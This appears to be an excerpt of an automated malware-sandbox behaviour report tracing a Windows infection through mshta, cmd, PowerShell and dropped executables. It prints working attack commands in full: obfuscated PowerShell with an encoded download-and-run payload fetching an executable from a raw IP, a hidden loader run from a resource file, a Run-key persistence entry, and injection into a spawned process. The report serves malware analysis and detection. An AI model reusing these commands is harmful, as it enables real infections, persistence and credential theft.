          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648 | Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 | Thread sleep count: 711 > 30
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 3484 | Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 11_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 11_2_00402862 FindFirstFileW,11_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 11_2_0040658F FindFirstFileW,FindClose,11_2_0040658F
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 23_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 23_2_00402862 FindFirstFileW,23_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 23_2_0040658F FindFirstFileW,FindClose,23_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 33_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,33_2_0040595A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 33_2_00402862 FindFirstFileW,33_2_00402862
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 33_2_0040658F FindFirstFileW,FindClose,33_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 34_2_0040AE51 FindFirstFileW,FindNextFileW,34_2_0040AE51
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 35_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,35_2_00407EF8
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 36_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,36_2_00407898
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 34_2_00418981 memset,GetSystemInfo,34_2_00418981
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\tsdrjareurci
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_11-3878
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_11-3882
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_23-3800
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_23-3952
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,34_2_0040DD85
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,34_2_004044A4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Windows\System32\cmd.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Section unmapped: C:\Windows\System32\cmd.exe base address: 400000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 1940000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 18FFF4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 1940000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 18FFF4
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
